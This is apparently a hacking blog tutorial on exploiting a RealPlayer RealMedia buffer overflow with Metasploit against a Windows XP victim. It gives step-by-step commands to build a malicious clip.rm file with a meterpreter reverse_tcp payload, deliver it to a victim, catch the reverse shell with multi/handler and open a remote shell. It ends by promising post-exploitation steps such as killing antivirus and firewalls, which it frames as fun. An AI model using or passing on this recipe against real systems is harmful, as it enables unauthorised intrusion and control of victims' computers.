Remote System Hacking using Real Player

RealPlayer RealMedia File Handling Buffer Overflow

This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure usage of the GetPrivateProfileString function to retrieve the URL property from an InternetShortcut section. This module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click methods. It has been tested successfully on Windows XP SP3 with RealPlayer 15.0.5.109.

Exploit Targets :

• Windows XP SP3 / Real Player 15.0.5.109 (default)

Requirements :

Attacker : Backtrack

Victim : windows xp 

Step 1 : open terminal and type msfconsole metasploit framework.

Step 2 : use exploit/Techtecno2u_custom_exploits/RealMedia_File_Handling_bof (in previous post we download this exploit from the exploit database and update it into our custom folder ) 

Step 3 : set payload windows/meterpreter/reverse_tcp

show options 

set FILENAME clip.rm  

set LHOST 192.168.56.101

exploit

as we exploit the malicious file clip.rm was generated in the root directory shown in fig. 
Now we need to send this file to the remote system if in the remote system the old version or unpatched software running then the system can be easily compromised 

Step 4 : use exploit/multi/handler to get reverse connection we are using the multi  handler 
Step 5 : set payload windows/meterpreter/reverse_tcp
Step 6 : exploit
as the victim click on the file the handler get the connection and we get the meterpreter session 

Step 7 : type shell to get remote shell  

let's check the IP address of the Remote system

Now we can perform what ever we want to the remote system like uploading any file ,downloading any file antivirus killing ,firewall  killing etc. operations these all are the post exploitation we will discus these soon ... So Its very fun part of the Hacking so to learn how to kill or how to download or upload file keep watching .....